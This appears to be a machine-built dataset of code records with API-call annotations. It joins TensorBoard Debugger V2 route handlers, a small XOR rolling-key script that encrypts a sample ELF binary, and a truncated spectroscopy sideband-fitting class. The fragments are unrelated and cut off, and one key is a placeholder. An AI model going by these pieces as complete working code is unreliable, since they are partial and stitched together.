# TODO(cais): Implement factory for DataProvider that takes into account
# the settings.
self._data_provider = debug_data_provider.LocalDebuggerV2DataProvider(
self._logdir
)
def get_plugin_apps(self):
# TODO(cais): Add routes as they are implemented.
return {
"/runs": self.serve_runs,
"/execution/digests": self.serve_execution_digests,
"/execution/data": self.serve_execution_data,
"/source_files/list": self.serve_source_files_list,
"/source_files/file": self.serve_source_file,
"/stack_frames/stack_frames": self.serve_stack_frames,
}
def is_active(self):
"""Check whether the Debugger V2 Plugin is always active.
When no data in the tfdbg v2 format is available, a custom information
screen is displayed to instruct the user on how to generate such data
to be able to use the plugin.
Returns:
`True` if and only if data in tfdbg v2's DebugEvent format is available.
"""
return bool(self._data_provider.list_runs(""))
def frontend_metadata(self):
return base_plugin.FrontendMetadata(
is_ng_component=True, tab_name="Debugger V2", disable_reload=True
)
@wrappers.Request.application
def serve_runs(self, request):
experiment = plugin_util.experiment_id(request.environ)
runs = self._data_provider.list_runs(experiment)
run_listing = dict()
for run in runs:
run_listing[run.run_id] = {"start_time": run.start_time}
return http_util.Respond(request, run_listing, "application/json")
@wrappers.Request.application
def serve_execution_digests(self, request):
experiment = plugin_util.experiment_id(request.environ)
run = request.args.get("run")
if run is None:
return _missing_run_error_response(request)
begin = int(request.args.get("begin", "0"))
end = int(request.args.get("end", "-1"))
run_tag_filter = debug_data_provider.execution_digest_run_tag_filter(
run, begin, end
)
blob_sequences = self._data_provider.read_blob_sequences(
experiment, self.plugin_name, run_tag_filter=run_tag_filter
)
tag = next(iter(run_tag_filter.tags))
try:
return http_util.Respond(
request,
self._data_provider.read_blob(
blob_sequences[run][tag][0].blob_key
),
"application/json",
)
except (IndexError, ValueError) as e:
return http_util.Respond(
request, {"error": str(e)}, "application/json", code=400,
)
@wrappers.Request.application
def serve_execution_data(self, request):
experiment = plugin_util.experiment_id(request.environ)
run = request.args.get("run")
if run is None:
return _missing_run_error_response(request)
begin = int(request.args.get("begin", "0"))
end = int(request.args.get("end", "-1"))
run_tag_filter = debug_data_provider.execution_data_run_tag_filter(
run, begin, end
)
blob_sequences = self._data_provider.read_blob_sequences(
experiment, self.plugin_name, run_tag_filter=run_tag_filter
)
tag = next(iter(run_tag_filter.tags))
try:
return http_util.Respond(
request,
self._data_provider.read_blob(
blob_sequences[run][tag][0].blob_key
),
"application/json",
)
except (IndexError, ValueError) as e:
return http_util.Respond(
request, {"error": str(e)}, "application/json", code=400,
)
@wrappers.Request.application
def serve_source_files_list(self, request):
"""Serves a list of all source files involved in the debugged program."""
experiment = plugin_util.experiment_id(request.environ)
run = request.args.get("run")
if run is None:
return _missing_run_error_response(request)
run_tag_filter = debug_data_provider.source_file_list_run_tag_filter(
run
)
blob_sequences = self._data_provider.read_blob_sequences(
experiment, self.plugin_name, run_tag_filter=run_tag_filter
)
tag = next(iter(run_tag_filter.tags))
return http_util.Respond(
request,
self._data_provider.read_blob(blob_sequences[run][tag][0].blob_key),
"application/json",
)
@wrappers.Request.application
def serve_source_file(self, request):
"""Serves the content of a given source file.
The source file is referred to by the index in the list of all source
files involved in the execution of the debugged program, which is
available via the `serve_source_files_list()` serving route.
Args:
request: HTTP request.
Returns:
Response to the request.
"""
experiment = plugin_util.experiment_id(request.environ)
run = request.args.get("run")
if run is None:
return _missing_run_error_response(request)
index = request.args.get("index")
# TOOD(cais): When the need arises, support serving a subset of a
# source file's lines.
if index is None:
return http_util.Respond(
request,
{"error": "index is not provided for source file content"},
"application/json",
code=400,
)
index = int(index)
run_tag_filter = debug_data_provider.source_file_run_tag_filter(
run, index
)
blob_sequences = self._data_provider.read_blob_sequences(
experiment, self.plugin_name, run_tag_filter=run_tag_filter
)
tag = next(iter(run_tag_filter.tags))
try:
return http_util.Respond(
request,
self._data_provider.read_blob(
blob_sequences[run][tag][0].blob_key
),
"application/json",
)
except IndexError as e:
return http_util.Respond(
request, {"error": str(e)}, "application/json", code=400,
)
@wrappers.Request.application
def serve_stack_frames(self, request):
"""Serves the content of stack frames.
The source frames being requested are referred to be UUIDs for each of
them, separated by commas.
Args:
request: HTTP request.
Returns:
Response to the request.
"""
experiment = plugin_util.experiment_id(request.environ)
run = request.args.get("run")
if run is None:
return _missing_run_error_response(request)
stack_frame_ids = request.args.get("stack_frame_ids")
if stack_frame_ids is None:
return http_util.Respond(
request,
{"error": "Missing stack_frame_ids parameter"},
"application/json",
code=400,
)
if not stack_frame_ids:
return http_util.Respond(
request,
{"error": "Empty stack_frame_ids parameter"},
"application/json",
code=400,
)
stack_frame_ids = stack_frame_ids.split(",")
run_tag_filter = debug_data_provider.stack_frames_run_tag_filter(
run, stack_frame_ids
)
blob_sequences = self._data_provider.read_blob_sequences(
experiment, self.plugin_name, run_tag_filter=run_tag_filter
)
tag = next(iter(run_tag_filter.tags))
try:
return http_util.Respond(
request,
self._data_provider.read_blob(
blob_sequences[run][tag][0].blob_key
),
"application/json",
)
except KeyError as e:
return http_util.Respond(
request,
{"error": "Cannot find stack frame with ID: %s" % e},
"application/json",
code=400,
)
|
[
"tensorboard.plugin_util.experiment_id",
"tensorboard.plugins.debugger_v2.debug_data_provider.execution_data_run_tag_filter",
"tensorboard.plugins.debugger_v2.debug_data_provider.stack_frames_run_tag_filter",
"tensorboard.plugins.base_plugin.FrontendMetadata",
"tensorboard.plugins.debugger_v2.debug_data_provider.source_file_run_tag_filter",
"tensorboard.plugins.debugger_v2.debug_data_provider.LocalDebuggerV2DataProvider",
"tensorboard.plugins.debugger_v2.debug_data_provider.execution_digest_run_tag_filter",
"tensorboard.plugins.debugger_v2.debug_data_provider.source_file_list_run_tag_filter",
"tensorboard.backend.http_util.Respond"
] |
[((1114, 1218), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', "{'error': 'run parameter is not provided'}", '"""application/json"""'], {'code': '(400)'}), "(request, {'error': 'run parameter is not provided'},\n 'application/json', code=400)\n", (1131, 1218), False, 'from tensorboard.backend import http_util\n'), ((1807, 1868), 'tensorboard.plugins.debugger_v2.debug_data_provider.LocalDebuggerV2DataProvider', 'debug_data_provider.LocalDebuggerV2DataProvider', (['self._logdir'], {}), '(self._logdir)\n', (1854, 1868), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((2862, 2961), 'tensorboard.plugins.base_plugin.FrontendMetadata', 'base_plugin.FrontendMetadata', ([], {'is_ng_component': '(True)', 'tab_name': '"""Debugger V2"""', 'disable_reload': '(True)'}), "(is_ng_component=True, tab_name='Debugger V2',\n disable_reload=True)\n", (2890, 2961), False, 'from tensorboard.plugins import base_plugin\n'), ((3071, 3113), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (3096, 3113), False, 'from tensorboard import plugin_util\n'), ((3309, 3368), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', 'run_listing', '"""application/json"""'], {}), "(request, run_listing, 'application/json')\n", (3326, 3368), False, 'from tensorboard.backend import http_util\n'), ((3473, 3515), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (3498, 3515), False, 'from tensorboard import plugin_util\n'), ((3760, 3828), 'tensorboard.plugins.debugger_v2.debug_data_provider.execution_digest_run_tag_filter', 'debug_data_provider.execution_digest_run_tag_filter', (['run', 'begin', 'end'], {}), '(run, begin, end)\n', (3811, 3828), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((4567, 4609), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (4592, 4609), False, 'from tensorboard import plugin_util\n'), ((4854, 4920), 'tensorboard.plugins.debugger_v2.debug_data_provider.execution_data_run_tag_filter', 'debug_data_provider.execution_data_run_tag_filter', (['run', 'begin', 'end'], {}), '(run, begin, end)\n', (4903, 4920), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((5744, 5786), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (5769, 5786), False, 'from tensorboard import plugin_util\n'), ((5930, 5986), 'tensorboard.plugins.debugger_v2.debug_data_provider.source_file_list_run_tag_filter', 'debug_data_provider.source_file_list_run_tag_filter', (['run'], {}), '(run)\n', (5981, 5986), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((6869, 6911), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (6894, 6911), False, 'from tensorboard import plugin_util\n'), ((7470, 7528), 'tensorboard.plugins.debugger_v2.debug_data_provider.source_file_run_tag_filter', 'debug_data_provider.source_file_run_tag_filter', (['run', 'index'], {}), '(run, index)\n', (7516, 7528), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((8526, 8568), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (8551, 8568), False, 'from tensorboard import plugin_util\n'), ((9299, 9368), 'tensorboard.plugins.debugger_v2.debug_data_provider.stack_frames_run_tag_filter', 'debug_data_provider.stack_frames_run_tag_filter', (['run', 'stack_frame_ids'], {}), '(run, stack_frame_ids)\n', (9346, 9368), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((7222, 7346), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', "{'error': 'index is not provided for source file content'}", '"""application/json"""'], {'code': '(400)'}), "(request, {'error':\n 'index is not provided for source file content'}, 'application/json',\n code=400)\n", (7239, 7346), False, 'from tensorboard.backend import http_util\n'), ((8804, 8912), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', "{'error': 'Missing stack_frame_ids parameter'}", '"""application/json"""'], {'code': '(400)'}), "(request, {'error': 'Missing stack_frame_ids parameter'},\n 'application/json', code=400)\n", (8821, 8912), False, 'from tensorboard.backend import http_util\n'), ((9039, 9145), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', "{'error': 'Empty stack_frame_ids parameter'}", '"""application/json"""'], {'code': '(400)'}), "(request, {'error': 'Empty stack_frame_ids parameter'},\n 'application/json', code=400)\n", (9056, 9145), False, 'from tensorboard.backend import http_util\n'), ((9883, 9997), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', "{'error': 'Cannot find stack frame with ID: %s' % e}", '"""application/json"""'], {'code': '(400)'}), "(request, {'error': 'Cannot find stack frame with ID: %s' %\n e}, 'application/json', code=400)\n", (9900, 9997), False, 'from tensorboard.backend import http_util\n')]
|
import sys
from os.path import join,dirname
sys.path.insert(0,dirname(__file__))
import pyronn_layers_dev
|
[
"os.path.dirname"
] |
[((62, 79), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (69, 79), False, 'from os.path import join, dirname\n')]
|
#!/usr/bin/env python
import sys
from cryptolib import RollingKey, cryptolib as cl
from itertools import izip
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-f", "--file", dest="input_filename", default="samples/binary_elf", help="Input file filename")
parser.add_option("-o", "--output", dest="output_filename", default="samples/binary_elf_encrypted", help="Output file filename")
parser.add_option("-k", "--key", dest="key", default="\<KEY>", help="Encryption key")
(options, args) = parser.parse_args()
rk = RollingKey(cl.str2int(options.key))
plaintext = open(options.input_filename, "rb").read()
ciphertext = list()
for c,k in izip(plaintext,rk):
ciphertext.append(chr(ord(c)^k))
out = open(options.output_filename, "wb")
out.write("".join(ciphertext))
out.close()
|
[
"cryptolib.cryptolib.str2int",
"itertools.izip",
"optparse.OptionParser"
] |
[((155, 169), 'optparse.OptionParser', 'OptionParser', ([], {}), '()\n', (167, 169), False, 'from optparse import OptionParser\n'), ((667, 686), 'itertools.izip', 'izip', (['plaintext', 'rk'], {}), '(plaintext, rk)\n', (671, 686), False, 'from itertools import izip\n'), ((556, 579), 'cryptolib.cryptolib.str2int', 'cl.str2int', (['options.key'], {}), '(options.key)\n', (566, 579), True, 'from cryptolib import RollingKey, cryptolib as cl\n')]
|
import os
import errno
import copy
import json
import numpy as np
from scipy.optimize import curve_fit
import matplotlib.pyplot as plt
from .ccd import CCD
from Stele.processing.processing_hsg.helper_functions import gauss
from .helper_functions import calc_laser_frequencies
np.set_printoptions(linewidth=500)
class HighSidebandCCD(CCD):
def __init__(
self, hsg_thing, parameter_dict=None, spectrometer_offset=None):
"""
This will read the appropriate file. The header needs to be fixed to
reflect the changes to the output header from the Andor file. Because
another helper file will do the cleaning and background subtraction,
those are no longer part of this init. This also turns all wavelengths
from nm (NIR ones) or cm-1 (THz ones) into eV.
OR, if an array is thrown in there, it'll handle the array and dict
Input:
For post-processing analysis:
hsg_thing = file name of the hsg spectrum from CCD superclass
spectrometer_offset = number of nanometers the spectrometer is
off by, should be 0.0...but can be 0.2 or 1.0
For Live-software:
hsg_thing = np array of spectrum from camera
parameter_dict = equipment dict generated by software
Internal:
self.hsg_thing = the filename
self.parameters = string with all the relevant experimental perameters
self.description = the description we added to the file as the data
was being taken
self.proc_data = processed data that has gone is frequency
vs counts/pulse
self.dark_stdev = this is not currently handled appropriately
self.addenda = the list of things that have been added to the file, in
form of [constant, *spectra_added]
self.subtrahenda = the list of spectra that have been subtracted from
the file. Constant subtraction is dealt with with
self.addenda
:param hsg_thing: file name for the file to be opened. OR the actually
hsg np.ndarray. Fun!
:type hsg_thing: str OR np.ndarray
:param parameter_dict: If being loaded through the data acquisition
GUI, throw the dict in here
:type parameter_dict: dict
:param spectrometer_offset: Number of nm the spectrometer is off by
:type spectrometer_offset: float
:return: None, technically
"""
if isinstance(hsg_thing, str):
super(HighSidebandCCD, self).__init__(
hsg_thing, spectrometer_offset=spectrometer_offset)
# TODO: fix addenda bullshit
self.addenda = []
self.subtrahenda = []
elif isinstance(hsg_thing, np.ndarray):
# Probably shouldn't shoehorn this in this way
self.parameters = parameter_dict.copy()
self.addenda = []
self.subtrahenda = []
self.ccd_data = np.array(hsg_thing)
self.ccd_data[:, 0] = 1239.84 / self.ccd_data[:, 0]
# This data won't have an error column, so attached a column of 1s
self.ccd_data = np.column_stack((
self.ccd_data, np.ones_like(self.ccd_data[:, 1])))
# Because turning into eV switches direction
self.ccd_data = np.flipud(self.ccd_data)
self.fname = "Live Data"
else:
raise Exception(
"I don't know what this file type is {}, type: {}".format(
hsg_thing, type(hsg_thing)))
self.proc_data = np.array(self.ccd_data)
# proc_data is now a 1600 long array with [frequency (eV),
# signal (counts / FEL pulse), S.E. of signal mean]
# self.parameters["nir_freq"] = 1239.84
# / float(self.parameters["nir_lambda"])
self.parameters["nir_freq"] = 1239.84 / float(self.parameters.get(
"nir_lambda", -1))
# self.parameters["thz_freq"] = 0.000123984 *
# float(self.parameters["fel_lambda"])
self.parameters["thz_freq"] = 0.000123984 * float(self.parameters.get(
"fel_lambda", -1))
# self.parameters["nir_power"] = float(self.parameters["nir_power"])
self.parameters["nir_power"] = float(self.parameters.get(
"nir_power", -1))
try: # This is the new way of doing things. Also, now it's power
self.parameters["thz_energy"] = float(
self.parameters["pulseEnergies"]["mean"])
self.parameters["thz_energy_std"] = float(
self.parameters["pulseEnergies"]["std"])
except Exception: # This is the old way TODO: DEPRECATE THIS
self.parameters["thz_energy"] = float(self.parameters.get(
"fel_power", -1))
# things used in fitting/guessing
self.sb_list = np.array([])
self.sb_index = np.array([])
self.sb_dict = {}
self.sb_results = np.array([])
self.full_dict = {}
def __add__(self, other):
"""
Add together the image data from self.proc_data, or add a constant to
that np.array. It will then combine the addenda and subtrahenda lists,
as well as add the fel_pulses together. If type(other) is a CCD
object, then it will add the errors as well.
Input:
self = CCD-like object
other = int, float or CCD object
Internal:
ret.proc_data = the self.proc_data + other(.proc_data)
ret.addenda = combination of two input addenda lists
This raises a FutureWarning because these were designed early on and
haven't been used much.
:param other: The thing to be added, it's either a int/float or a
HighSidebandCCD object
:type other: int/float or HighSidebandCCD
:return: Sum of self and other
:rtype: HighSidebandCCD
"""
raise FutureWarning
ret = copy.deepcopy(self)
# Add a constant offset to the data
if type(other) in (int, float):
ret.proc_data[:, 1] = self.proc_data[:, 1] + other
ret.addenda[0] = ret.addenda[0] + other
# or add the data of two hsg_spectra together
else:
if np.isclose(ret.parameters['center_lambda'],
other.parameters['center_lambda']):
ret.proc_data[:, 1] = (
self.proc_data[:, 1] + other.proc_data[:, 1])
ret.proc_data[:, 2] = np.sqrt(
self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)
ret.addenda[0] = ret.addenda[0] + other.addenda[0]
ret.addenda.extend(other.addenda[1:])
ret.subtrahenda.extend(other.subtrahenda)
ret.parameters['fel_pulses'] += other.parameters['fel_pulses']
else:
raise Exception(
'Source: Spectrum.__add__:\n' +
'These are not from the same grating settings')
return ret
def __sub__(self, other):
"""
This subtracts constants or other data sets between self.proc_data. I
think it even keeps track of what data sets are in the file and how
they got there.
See how __add__ works for more information.
This raises a FutureWarning because these were designed early on and
haven't been used much.
:param other: The thing to be subtracted, it's either a int/float or a
HighSidebandCCD object
:type other: int/float or HighSidebandCCD
:return: Sum of self and other
:rtype: HighSidebandCCD
"""
raise FutureWarning
ret = copy.deepcopy(self)
# Subtract a constant offset to the data
if type(other) in (int, float):
# Need to choose a name
ret.proc_data[:, 1] = self.proc_data[:, 1] - other
ret.addenda[0] = ret.addenda[0] - other
# Subtract the data of two hsg_spectra from each other
else:
if np.isclose(ret.proc_data[0, 0], other.proc_data[0, 0]):
ret.proc_data[:, 1] = (
self.proc_data[:, 1] - other.proc_data[:, 1])
ret.proc_data[:, 2] = np.sqrt(
self.proc_data[:, 1] ** 2 + other.proc_data[:, 1] ** 2)
ret.subtrahenda.extend(other.addenda[1:])
ret.addenda.extend(other.subtrahenda)
else:
raise Exception(
'Source: Spectrum.__sub__:\n' +
'These are not from the same grating settings')
return ret
def __repr__(self):
"""
This returns a string of filename, series, spectrometer step,
and the wavelengths of FEL and NIR lasers.
"""
base = """
fname: {},
Series: {series},
spec_step: {spec_step},
fel_lambda: {fel_lambda},
nir_lambda: {nir_lambda}""".format(
os.path.basename(self.fname), **self.parameters)
return base
__str__ = __repr__
def calc_approx_sb_order(self, test_nir_freq):
"""
This simple method will simply return a float approximating the order
of the frequency input. We need this because the CCD wavelength
calibration is not even close to perfect. And it shifts by half a nm
sometimes.
:param test_nir_freq: the frequency guess of the nth sideband
:type test_nir_freq: float
:return: The approximate order of the sideband in question
:rtype: float
"""
nir_freq = self.parameters['nir_freq']
thz_freq = self.parameters['thz_freq']
# If thz = 0, prevent error
if not thz_freq:
thz_freq = 1
approx_order = (test_nir_freq - nir_freq) / thz_freq
return approx_order
# TODO: break the following definition into multiple parts, possibly files
def guess_sidebands(self, cutoff=4.5, verbose=False, plot=False, **kwargs):
"""
Update 05/24/18:
Hunter had two different loops for negative order sidebands,
then positive order sidebands. They're done pretty much identically,
so I've finally merged them into one.
Finds the locations of all the sidebands in the proc_data array to be
able to seed the fitting method. This works by finding the maximum
data value in the array and guessing what sideband it is. It creates
an array that includes this information. It will then step down,
initially by one THz frequency, then by twos after it hasn't found any
odd ones. It then goes up from the max and finds everything above in
much the same way.
There is currently no rhyme or reason to a cutoff of 8. I don't know
what it should be changed to, though.
Input:
cutoff = signal-to-noise threshold to count a sideband candidate.
kwargs:
window_size: how big of a window (in pixels) to use for checking for
sidebands. Specified in half-width
default: 15
Internal:
self.sb_list = List of all of the orders the method found
self.sb_index = index of all of the peaks of the sidebands
self.sb_guess = three-part list including the frequency, amplitude and
error guesses for each sideband
"""
# TODO: this isn't commented appropriately.
# Will it be made more readable first?
if "cutoff" in self.parameters:
cutoff = self.parameters["cutoff"]
else:
self.parameters['cutoff for guess_sidebands'] = cutoff
if verbose:
print("=" * 15)
print()
print("Guessing CCD Sideband parameters")
print(os.path.basename(self.fname))
print("\tCutoff = {}".format(cutoff))
print()
print("=" * 15)
x_axis = np.array(self.proc_data[:, 0])
y_axis = np.array(self.proc_data[:, 1])
try:
error = np.array(self.proc_data[:, 2])
except IndexError:
# Happens on old data where spectra weren't calculated in the live
# software.
error = np.ones_like(x_axis)
min_sb = int(self.calc_approx_sb_order(x_axis[0])) + 1
try:
max_sb = int(self.calc_approx_sb_order(x_axis[-1]))
except ValueError:
print(x_axis)
nir_freq = self.parameters["nir_freq"]
thz_freq = self.parameters["thz_freq"]
if verbose:
print("min_sb: {} | max_sb: {}".format(min_sb, max_sb))
# Find max strength sideband and it's order
global_max = np.argmax(y_axis)
order_init = int(round(self.calc_approx_sb_order(x_axis[global_max])))
# if verbose:
# print "The global max is at index", global_max
if global_max < 15:
check_y = y_axis[:global_max + 15]
check_y = np.concatenate((np.zeros(15 - global_max), check_y))
elif global_max > 1585:
check_y = y_axis[global_max - 15:]
check_y = np.concatenate((check_y, np.zeros(global_max - 1585)))
else:
check_y = y_axis[global_max - 15:global_max + 15]
check_max_index = np.argmax(check_y)
check_max_area = np.sum(
check_y[check_max_index - 2:check_max_index + 3])
check_ave = np.mean(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])
check_stdev = np.std(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])
check_ratio = (check_max_area - 3 * check_ave) / check_stdev
if verbose:
print(("{:^16}" * 5).format(
"global_max idx", "check_max_area", "check_ave", "check_stdev",
"check_ratio"))
print(("{:^16.5g}" * 5).format(
global_max, check_max_area, check_ave,
check_stdev, check_ratio))
if check_ratio > cutoff:
self.sb_list = [order_init]
self.sb_index = [global_max]
sb_freq_guess = [x_axis[global_max]]
sb_amp_guess = [y_axis[global_max]]
sb_error_est = [
np.sqrt(sum(
[i ** 2 for i in error[global_max - 2:global_max + 3]]))
/ (check_max_area - 5 * check_ave)]
else:
print("There are no sidebands in", self.fname)
raise RuntimeError
if verbose:
print("\t Looking for sidebands with f < {:.6f}".format(
sb_freq_guess[0]))
last_sb = sb_freq_guess[0]
index_guess = global_max
# keep track of how many consecutive sidebands we've skipped. Sometimes
# one's noisy or something, so we keep looking after skipping one
consecutive_null_sb = 0
consecutive_null_odd = 0
no_more_odds = False
break_condition = False
for order in range(order_init - 1, min_sb - 1, -1):
# Check to make sure we're not looking at an odd when
# we've decided to skip them.
if no_more_odds is True and order % 2 == 1:
last_sb = last_sb - thz_freq
if verbose:
print("I skipped", order)
continue
# Window size to look for next sideband. Needs to be order
# dependent because higher orders get wider, so we need to look at
# more. Values are arbitrary.
window_size = 0.45 + 0.0004 * order # used to be last_sb?
lo_freq_bound = last_sb - thz_freq * (
1 + window_size) # Not sure what to do about these
hi_freq_bound = last_sb - thz_freq * (1 - window_size)
if verbose:
print("\nSideband", order)
print("\t{:.4f} < f_{} < {:.4f}".format(lo_freq_bound, order,
hi_freq_bound))
# Get the indices tenergies lie within the bounds for this SB
sliced_indices = \
np.where((x_axis > lo_freq_bound)
& (x_axis < hi_freq_bound))[0]
start_index, end_index = sliced_indices.min(), sliced_indices.max()
# Get a slice of the y_data which is only in the region of interest
check_y = y_axis[sliced_indices]
check_max_index = np.argmax(
check_y) # This assumes that two floats won't be identical
# Calculate the "area" of the sideband by looking at the peak value
# within the range, and the pixel above/below it
check_max_area = np.sum(
check_y[check_max_index - 1:check_max_index + 2])
if verbose and plot:
plt.figure("CCD data")
plt.plot(
[lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[lo_freq_bound, hi_freq_bound], [check_y[check_max_index]]
* 2, 'b', label="{} Box".format(order))
plt.text(
(lo_freq_bound + hi_freq_bound) / 2,
check_y[check_max_index], order)
# get slice that doesn't have the peak in it to compare statistics
check_region = np.append(check_y[:check_max_index - 1],
check_y[check_max_index + 2:])
check_ave = check_region.mean()
check_stdev = check_region.std()
# Calculate an effective SNR, where check_ave is roughly the
# background level
check_ratio = (check_max_area - 3 * check_ave) / check_stdev
# This raises the barrier for odd sideband detection
if order % 2 == 1:
check_ratio = check_ratio / 1.5
if verbose:
print("\t" + ("{:^14}" * 4).format(
"check_max_area", "check_ave",
"check_stdev", "check_ratio"))
print("\t" + ("{:^14.5g}" * 4).format(
check_max_area, check_ave, check_stdev, check_ratio))
if check_ratio > cutoff:
found_index = check_max_index + start_index
self.sb_index.append(found_index)
last_sb = x_axis[found_index]
if verbose:
print("I just found", last_sb)
sb_freq_guess.append(x_axis[found_index])
sb_amp_guess.append(check_max_area - 3 * check_ave)
error_est = np.sqrt(
sum(
[i ** 2 for i in error[
found_index - 1:found_index + 2]]
)) / (check_max_area - 3 * check_ave)
if verbose:
print("My error estimate is:", error_est)
sb_error_est.append(error_est)
self.sb_list.append(order)
consecutive_null_sb = 0
if order % 2 == 1:
consecutive_null_odd = 0
else:
# print "I could not find sideband with order", order
last_sb = last_sb - thz_freq
consecutive_null_sb += 1
if order % 2 == 1:
consecutive_null_odd += 1
if consecutive_null_odd == 1 and no_more_odds is False:
# print "I'm done looking for odd sidebands"
no_more_odds = True
if consecutive_null_sb == 2:
# print "I can't find any more sidebands"
break
# Look for higher sidebands
if verbose:
print("\nLooking for higher energy sidebands")
last_sb = sb_freq_guess[0]
index_guess = global_max
consecutive_null_sb = 0
consecutive_null_odd = 0
no_more_odds = False
break_condition = False
for order in range(order_init + 1, max_sb + 1):
if no_more_odds is True and order % 2 == 1:
last_sb = last_sb + thz_freq
continue
window_size = 0.45 + 0.001 * order # used to be 0.28 and 0.0004
lo_freq_bound = last_sb + thz_freq * (
1 - window_size) # Not sure what to do about these
hi_freq_bound = last_sb + thz_freq * (1 + window_size)
start_index = False
end_index = False
if verbose:
print("\nSideband", order)
# print "The low frequency bound is", lo_freq_bound
# print "The high frequency bound is", hi_freq_bound
print("\t{:.4f} < f_{} < {:.4f}".format(lo_freq_bound, order,
hi_freq_bound))
for i in range(index_guess, 1600):
if start_index is False and i == 1599:
# print "I'm all out of space, captain!"
break_condition = True
break
elif start_index is False and x_axis[i] > lo_freq_bound:
# print "start_index is", i
start_index = i
elif i == 1599:
end_index = 1599
# print "hit end of data, end_index is 1599"
elif end_index is False and x_axis[i] > hi_freq_bound:
end_index = i
# print "end_index is", i
index_guess = i
break
if break_condition:
break
check_y = y_axis[start_index:end_index]
# This assumes that two floats won't be identical
check_max_index = np.argmax(check_y)
# To be able to break down check_y into eighths
octant = len(check_y) // 8
if octant < 1:
octant = 1
check_max_area = np.sum(
check_y[check_max_index - octant - 1:
check_max_index + octant + 1])
if verbose and plot:
plt.figure("CCD data")
plt.plot(
[lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[lo_freq_bound, hi_freq_bound],
[check_y[check_max_index]] * 2, 'b', label=order)
plt.text(
(lo_freq_bound + hi_freq_bound) / 2,
check_y[check_max_index], order)
no_peak = (2 * len(
check_y)) // 6 # The denominator is in flux, used to be 5
# if verbose: print "\tcheck_y length", len(check_y)
check_ave = np.mean(np.take(check_y, np.concatenate(
(np.arange(no_peak), np.arange(-no_peak, 0)))))
check_stdev = np.std(np.take(check_y, np.concatenate(
(np.arange(no_peak), np.arange(-no_peak, 0)))))
check_ratio = (
check_max_area - (2 * octant + 1) * check_ave) / check_stdev
if verbose:
print("\tIndices: {}->{} (d={})".format(start_index, end_index,
len(check_y)))
# print "check_y is", check_y
# print "\ncheck_max_area is", check_max_area
# print "check_ave is", check_ave
# print "check_stdev is", check_stdev
# print "check_ratio is", check_ratio
print("\t" + ("{:^14}" * 4).format(
"check_max_area", "check_ave",
"check_stdev", "check_ratio"))
print("\t" + ("{:^14.6g}" * 4).format(
check_max_area, check_ave, check_stdev, check_ratio))
# This raises the barrier for odd sideband detection
if order % 2 == 1:
check_ratio = check_ratio / 2
if check_ratio > cutoff:
found_index = check_max_index + start_index
self.sb_index.append(found_index)
last_sb = x_axis[found_index]
# print "\tI found", order, "at index", found_index, "at freq", last_sb
if verbose:
print(
"\tI'm counting this SB at index {} (f={:.4f})".format(
found_index, last_sb),
end=' ')
sb_freq_guess.append(
x_axis[found_index])
sb_amp_guess.append(
check_max_area - (2 * octant + 1) * check_ave)
# This error is a relative error.
error_est = (
np.sqrt(sum([i ** 2 for i in error[
found_index - octant:found_index + octant]]))
/ (check_max_area - (2 * octant + 1) * check_ave))
if verbose:
print(". Err = {:.3g}".format(error_est))
# print "\tMy error estimate is:", error_est
# print "My relative error is:", error_est / sb_amp_guess
sb_error_est.append(error_est)
self.sb_list.append(order)
consecutive_null_sb = 0
if order % 2 == 1:
consecutive_null_odd = 0
else:
# print "I could not find sideband with order", order
last_sb = last_sb + thz_freq
consecutive_null_sb += 1
if order % 2 == 1:
consecutive_null_odd += 1
if verbose:
print("\t\tI did not count this sideband")
if consecutive_null_odd == 1 and no_more_odds is False:
# print "I'm done looking for odd sidebands"
no_more_odds = True
if consecutive_null_sb == 2:
# print "I can't find any more sidebands"
break
if verbose:
print("I found these sidebands:", self.sb_list)
print('-' * 15)
print()
print()
# self.sb_guess = [frequency guess, amplitude guess,
# relative error of amplitude] for each sideband.
self.sb_guess = np.array([np.asarray(sb_freq_guess),
np.asarray(sb_amp_guess),
np.asarray(sb_error_est)]).T
# TODO: altar guess_sidebands and guess_sidebandsOld to share functions
def guess_sidebandsOld(
self, cutoff=4.5, verbose=False, plot=False, **kwargs):
"""
05/24/18
Old code from Hunter's days (or nearly, I've already started cleaning
some stuff up). keeping it around in case I break too much stuff
Finds the locations of all the sidebands in the proc_data array to be
able to seed the fitting method. This works by finding the maximum
data value in the array and guessing what sideband it is. It creates
an array that includes this information. It will then step down,
initially by one THz frequency, then by twos after it hasn't found any
odd ones. It then goes up from the max and finds everything above in
much the same way.
There is currently no rhyme or reason to a cutoff of 8. I don't know
what it should be changed to, though.
Input:
cutoff = signal-to-noise threshold to count a sideband candidate.
